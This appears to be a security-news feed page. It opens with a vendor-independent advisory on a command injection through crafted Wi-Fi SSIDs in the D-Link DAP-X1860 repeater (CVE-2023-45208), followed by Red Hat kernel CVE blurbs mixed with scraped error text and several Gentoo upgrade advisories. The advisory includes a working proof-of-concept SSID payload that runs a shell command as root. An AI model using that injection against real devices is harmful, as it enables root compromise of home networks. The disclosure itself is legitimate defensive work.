A command injection in the parsing_xml_stasurvey function inside libcgifunc.so of the D-Link DAP-X1860 repeater 1.00 through 1.01b05-01 allows attackers (within range of the repeater) to run shell commands as root during the setup process of the repeater, via a crafted SSID. Also, network names containing single quotes (in the range of the repeater) can result in a denial of service.

The Wi-Fi network scanning functionality of the D-Link DAP-X1860 range extender is susceptible to remote command injection. Attackers who create a Wi-Fi network with a crafted SSID in range of the extender can run shell commands during the setup process or when using the network scan function of the range extender.


Details
=======

Product: D-Link DAP-X1860
Affected Versions: Tested on 1.00, 1.01b94, 1.01b05-01, other versions may be affected, too
Fixed Versions: Not fixed
Vulnerability Type: Command Injection
Security Risk: medium
Vendor URL: https://eu.dlink.com/de/de/products/dap-x1860-ax1800-mesh-wifi-6-range-extender
Vendor Status: notified, not responding
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2023-006
Advisory Status: published
CVE: CVE-2023-45208
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-45208


Introduction
============

The D-Link DAP-X1860 is a Mesh Wi-Fi 6 Range Extender.


More Details
============

During the setup process of the range extender, nearby Wi-Fi networks are identified using the SOAP action "GetSiteSurvey". If a Wi-Fi network with a single tick (such as \`Olaf's Network\`) in its SSID is in range of the extender, the setup process will crash repeatedly with the following response from the server:

------------------------------------------------------------------------
Error 500: Internal Server Error
CGI program sent malformed HTTP headers: \[0   1   \*\*\*\*\*                \*\*:\*\*:\*\*:\*\*:\*\*:\*\*   WPA2PSK/AES 7        11b/g/n     NONE   In 17       YES      NO
1   1   \*\*\*\*\*               \*\*:\*\*:\*\*:\*\*:\*\*:\*\* WPA2PSK/AES            24       11b/g/n     NONE   In 13 YES      NO
2   1   \*\*\*\*\*               \*\*:\*\*:\*\*:\*\*:\*\*:\*\* WPA2PSK/AES            47       11b/g/n/ax  NONE   In 13 YES      NO
3   1   \*\*\*\*\*               \*\*:\*\*:\*\*:\*\*:\*\*:\*\* WPAPSKWPA2PSK/TKIPAES  81       11b/g/n     NONE   In 7 YES      NO
4   1   \*\*\*\*\*               \*\*:\*\*:\*\*:\*\*:\*\*:\*\* WPA2PSKWPA3PSK/AES     63       11b/g/n/ax  NONE   In 19 YES      NO
5   1   \*\*\*\*\*               \*\*:\*\*:\*\*:\*\*:\*\*:\*\* WPA2PSK/AES            44       11b/g/n/ax  NONE   In 5 NO      NO
6   1   Olafs Network \*\*:\*\*:\*\*:\*\*:\*\*:\*\* WPA2PSK/AES 47 11b/g/n/ax NONE In 20 NO NO
sh: 7: not found
sh
------------------------------------------------------------------------ 

The output \`sh: 7: not found\` indicates that the extender attempted to
execute some command and the single tick that was originally present in the Wi-Fi network \`Olaf's Network\` is missing in the output. Additionally, the sixth line does not have the same alignment of spaces compared to the other lines.

This alone can be exploited as a denial-of-service-vulnerability as the setup process cannot be finished. However, it was also possible to execute arbitrary commands on the extender. For instance, it was attempted to inject the command \`uname -a\` which lists general kernel information. To do this, a Wi-Fi network within range was created with a SSID starting with a single tick and the command separated by the logical shell operator "&&". The network was started using create\_ap \[1\]:

------------------------------------------------------------------------
$ create\_ap -n wlan0 "Test' && uname -a &&" randompw98zwrd8g283d3
------------------------------------------------------------------------ 

After rescanning for Wi-Fi networks on the range extender, this results in an HTTP 500 error code, including the output of the injected command:

------------------------------------------------------------------------
Error 500: Internal Server Error
CGI program sent malformed HTTP headers: \[0   1   \*\*\*\*\*                \*\*:\*\*:\*\*:\*\*:\*\*:\*\*   WPA2PSK/AES 0        11b/g/n     NONE   In 17       YES      NO
1   1   Test
Linux dlink-rp 4.4.198 #3 SMP Mon Jan 11 10:38:51 CST 2021 mips GNU/Linux
sh: \*\*:\*\*:\*\*:\*\*:\*\*:\*\*: not found
sh: 2: not found
sh: 3: not found
sh: 4: not found
\[...\]
sh: 40: not
------------------------------------------------------------------------ 

As can be seen, the command was executed and its output was printed in the response. Further analysis of the device revealed that all processes on the device including the injected commands run as the high-privileged root user. 

The vulnerability originates from the \`parsing\_xml\_stasurvey\` function in libcgifunc.so, where a system command is executed containing the SSIDs from the Wi-Fi scan results without proper escaping:

------------------------------------------------------------------------
\[...\]
snprintf(acStack\_1a0,100,"echo %s > /tmp/Channel\_check",&scanned\_ap\_info);
system(acStack\_1a0);
\[...\]
------------------------------------------------------------------------ 


Proof of Concept
================

Create a Wi-Fi network with an SSID containing a single tick, followed by some shell command separator, e.g. "&&" and the command to be run. In the following, create\_ap\[1\] was used to create the Wi-Fi network:

------------------------------------------------------------------------
$ create\_ap -n wlan0 "Test' && uname -a &&" random98zwrd8g283d3
------------------------------------------------------------------------ 

To trigger the exploit, run the setup process of the range extender, or if it is already configured, run a network scan. The output of the command can be seen in HTTP responses of the extender's web interface.

Security Risk
=============

Attackers that are physically located in the Wi-Fi range of the extender may leverage this vulnerability to obtain access to the extender's local network. While the injected commands are only executed during device setup or during a manual Wi-Fi scan, attackers could try to de-authenticate the extender such that the owner triggers a Wi-Fi scan to make the extender work again. As a result, this vulnerability is rated to pose a medium risk.


Timeline
========

2023-05-06 Vulnerability identified
2023-05-08 Reported to security@dlink.com
2023-06-19 After receiving no reply, a reminder was sent to security@dlink.com
2023-07-21 After again receiving no reply, a D-Link security contact known from
a previous disclosure was notified directly
2023-08-07 After again receiving no reply, another reminder sent to
security@dlink.com
2023-10-05 CVE ID requested
2023-10-05 CVE ID assigned
2023-10-09 Advisory released


References
==========

\[1\]: https://github.com/oblique/create\_ap


RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. 

As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/


Working at RedTeam Pentesting
=============================

RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit:
https://jobs.redteam-pentesting.de/

CVE-2023-45208: D-Link DAP-X1860: Remote Command Injection

A flaw was found in the XFRM subsystem in the Linux kernel. The specific flaw exists within the processing of state filters, which can result in a read past the end of an allocated buffer. This flaw allows a local privileged (CAP_NET_ADMIN) attacker to trigger an out-of-bounds read, potentially leading to an information disclosure.

'2226788?cve=title' is not a valid bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2023-39194: Invalid Bug ID

A flaw was found in the Netfilter subsystem in the Linux kernel. The nfnl_osf_add_callback function did not validate the user mode controlled opt_num field. This flaw allows a local privileged (CAP_NET_ADMIN) attacker to trigger an out-of-bounds read, leading to a crash or information disclosure.

**Red Hat Product Security Center**

Engage with our Red Hat Product Security team, access security updates, and ensure your environments are not exposed to any known security vulnerabilities.

Product Security Center

CVE-2023-39189: cve-details

A flaw was found in the Netfilter subsystem in the Linux kernel. The sctp_mt_check did not validate the flag_count field. This flaw allows a local privileged (CAP_NET_ADMIN) attacker to trigger an out-of-bounds read, leading to a crash or information disclosure.

'2226787?cve=title' is not a valid bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2023-39193: Invalid Bug ID

A flaw was found in the Netfilter subsystem in the Linux kernel. The xt_u32 module did not validate the fields in the xt_u32 structure. This flaw allows a local privileged attacker to trigger an out-of-bounds read by setting the size fields with a value beyond the array boundaries, leading to a crash or information disclosure.

'2226784?cve=title' is not a valid bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2023-39192: Invalid Bug ID

Gentoo Linux Security Advisory 202310-9 - Multiple vulnerabilities have been discovered in c-ares the worst of which could result in Denial of Service. Versions greater than or equal to 1.19.1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202310-09  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: c-ares: Multiple Vulnerabilities  
     Date: October 08, 2023  
     Bugs: #906964  
       ID: 202310-09

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been discovered in c-ares the worst of  
which could result in Denial of Service.

Background  
=========  
c-ares is a C library for asynchronous DNS requests (including name  
resolves).

Affected packages  
================  
Package         Vulnerable    Unaffected  
--------------  ------------  ------------  
net-dns/c-ares  < 1.19.1      >= 1.19.1

Description  
==========  
Multiple vulnerabilities have been discovered in c-ares. Please review  
the CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All c-ares users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=net-dns/c-ares-1.19.1"

References  
=========  
[ 1 ] CVE-2023-31124  
      https://nvd.nist.gov/vuln/detail/CVE-2023-31124  
[ 2 ] CVE-2023-31130  
      https://nvd.nist.gov/vuln/detail/CVE-2023-31130  
[ 3 ] CVE-2023-31147  
      https://nvd.nist.gov/vuln/detail/CVE-2023-31147  
[ 4 ] CVE-2023-32067  
      https://nvd.nist.gov/vuln/detail/CVE-2023-32067

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202310-09

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202310-09

Gentoo Linux Security Advisory 202310-8 - A root privilege escalation through setuid executable and cron job has been discovered in man-db. Versions greater than or equal to 2.8.5 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202310-08  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: man-db: privilege escalation  
     Date: October 08, 2023  
     Bugs: #662438  
       ID: 202310-08

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
A root privilege escalation through setuid executable and cron job has  
been discovered in man-db.

Background  
=========  
man-db is a man replacement that utilizes BerkeleyDB instead of flat  
files.

Affected packages  
================  
Package          Vulnerable    Unaffected  
---------------  ------------  ------------  
sys-apps/man-db  < 2.8.5       >= 2.8.5

Description  
==========  
A root privilege escalation through setuid executable and cron job has  
been discovered in man-db. Please review the CVE identifier referenced  
below for details.

Impact  
=====  
A local user with access to the man user or group can elevate privileges  
to root.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All man-db users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=sys-apps/man-db-2.8.5"

References  
=========  
[ 1 ] CVE-2018-25078  
      https://nvd.nist.gov/vuln/detail/CVE-2018-25078

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202310-08

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202310-08

Gentoo Linux Security Advisory 202310-7 - Multiple vulnerabilities have been discovered in VirtualBox, leading to compromise of VirtualBox. Versions greater than or equal to 7.0.6 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202310-07  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Oracle VirtualBox: Multiple Vulnerabilities  
     Date: October 08, 2023  
     Bugs: #891327  
       ID: 202310-07

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been discovered in VirtualBox, leading to  
compomise of VirtualBox.

Background  
=========  
VirtualBox is a powerful virtualization product from Oracle.

Affected packages  
================  
Package                   Vulnerable    Unaffected  
------------------------  ------------  ------------  
app-emulation/virtualbox  < 7.0.6       >= 7.0.6

Description  
==========  
Multiple vulnerabilities have been discovered in Oracle VirtualBox, the  
worst of which may lead to VirtualBox compromise by an attacker with  
network access.

Please review the CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All Oracle VirtualBox users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=app-emulation/virtualbox-7.0.6"

If you still need to use VirtualBox 6:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=app-emulation/virtualbox-6.1.46" "=app-emulation/virtualbox-6*"

References  
=========  
[ 1 ] CVE-2023-21884  
      https://nvd.nist.gov/vuln/detail/CVE-2023-21884  
[ 2 ] CVE-2023-21885  
      https://nvd.nist.gov/vuln/detail/CVE-2023-21885  
[ 3 ] CVE-2023-21886  
      https://nvd.nist.gov/vuln/detail/CVE-2023-21886  
[ 4 ] CVE-2023-21889  
      https://nvd.nist.gov/vuln/detail/CVE-2023-21889  
[ 5 ] CVE-2023-21898  
      https://nvd.nist.gov/vuln/detail/CVE-2023-21898  
[ 6 ] CVE-2023-21899  
      https://nvd.nist.gov/vuln/detail/CVE-2023-21899

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202310-07

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202310-07

Gentoo Linux Security Advisory 202310-6 - Multiple vulnerabilities have been discovered in Heimdal, the worst of which could lead to remote code execution on a KDC. Versions greater than or equal to 7.8.0-r1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202310-06  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Heimdal: Multiple Vulnerabilities  
     Date: October 08, 2023  
     Bugs: #881429, #893722  
       ID: 202310-06

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been discovered in Heimdal, the worst of  
which could lead to remote code execution on a KDC.

Background  
=========  
Heimdal is a free implementation of Kerberos 5.

Affected packages  
================  
Package            Vulnerable    Unaffected  
-----------------  ------------  ------------  
app-crypt/heimdal  < 7.8.0-r1    >= 7.8.0-r1

Description  
==========  
Multiple vulnerabilities have been discovered in Heimdal, the worst of  
which could lead to remote code execution on a Kerberos Domain  
Controller.

Please review the CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All Cross-realm trust vulnerability in Heimdal users should upgrade to  
the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=app-crypt/heimdal-7.8.0-r1"

References  
=========  
[ 1 ] CVE-2019-14870  
      https://nvd.nist.gov/vuln/detail/CVE-2019-14870  
[ 2 ] CVE-2021-44758  
      https://nvd.nist.gov/vuln/detail/CVE-2021-44758  
[ 3 ] CVE-2022-3437  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3437  
[ 4 ] CVE-2022-3671  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3671  
[ 5 ] CVE-2022-41916  
      https://nvd.nist.gov/vuln/detail/CVE-2022-41916  
[ 6 ] CVE-2022-42898  
      https://nvd.nist.gov/vuln/detail/CVE-2022-42898  
[ 7 ] CVE-2022-44640  
      https://nvd.nist.gov/vuln/detail/CVE-2022-44640  
[ 8 ] CVE-2022-44758  
      https://nvd.nist.gov/vuln/detail/CVE-2022-44758  
[ 9 ] CVE-2022-45142  
      https://nvd.nist.gov/vuln/detail/CVE-2022-45142

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202310-06

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202310-06

Gentoo Linux Security Advisory 202310-5 - A vulnerability has been found in dav1d which could result in denial of service. Versions greater than or equal to 1.2.0 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202310-05  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Low  
    Title: dav1d: Denial of Service  
     Date: October 08, 2023  
     Bugs: #906107  
       ID: 202310-05

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
A vulnerability has been found in dav1d which could result in denial of  
service.

Background  
=========  
dav1d is an AV1 decoder.

Affected packages  
================  
Package           Vulnerable    Unaffected  
----------------  ------------  ------------  
media-libs/dav1d  < 1.2.0       >= 1.2.0

Description  
==========  
In some circumstances, dav1d might treat an invalid frame as valid,  
resulting in a crash.

Impact  
=====  
Malformed frame data can result in a denial of service.

Workaround  
=========  
Users should avoid parsing untrusted video with dav1d.

Resolution  
=========  
All dav1d users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=media-libs/dav1d-1.2.0"

References  
=========  
[ 1 ] CVE-2023-32570  
      https://nvd.nist.gov/vuln/detail/CVE-2023-32570

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202310-05

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Tag

#linux